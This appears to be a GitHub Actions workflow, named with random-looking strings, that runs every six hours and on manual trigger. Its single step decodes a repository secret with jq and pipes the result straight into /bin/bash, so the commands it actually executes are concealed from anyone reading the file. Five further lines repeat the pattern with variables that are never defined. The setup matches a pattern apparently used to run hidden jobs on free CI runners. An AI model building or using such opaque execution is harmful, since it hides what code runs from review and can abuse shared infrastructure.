name: qiliangping4536
on:
  workflow_dispatch:
  schedule:
    - cron: '50 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qiliangping4536
        env:
          r353: ${{ secrets.r353 }}
        run: |
          echo $r353 | jq -r .m336 | /bin/bash
          echo $ij8 | jq -r .enih460 | /bin/bash
          echo $a730 | jq -r .te625 | /bin/bash
          echo $dg70 | jq -r .fcc74664 | /bin/bash
          echo $fi492 | jq -r .u665 | /bin/bash
          echo $fwd667 | jq -r .bihsh8584 | /bin/bash

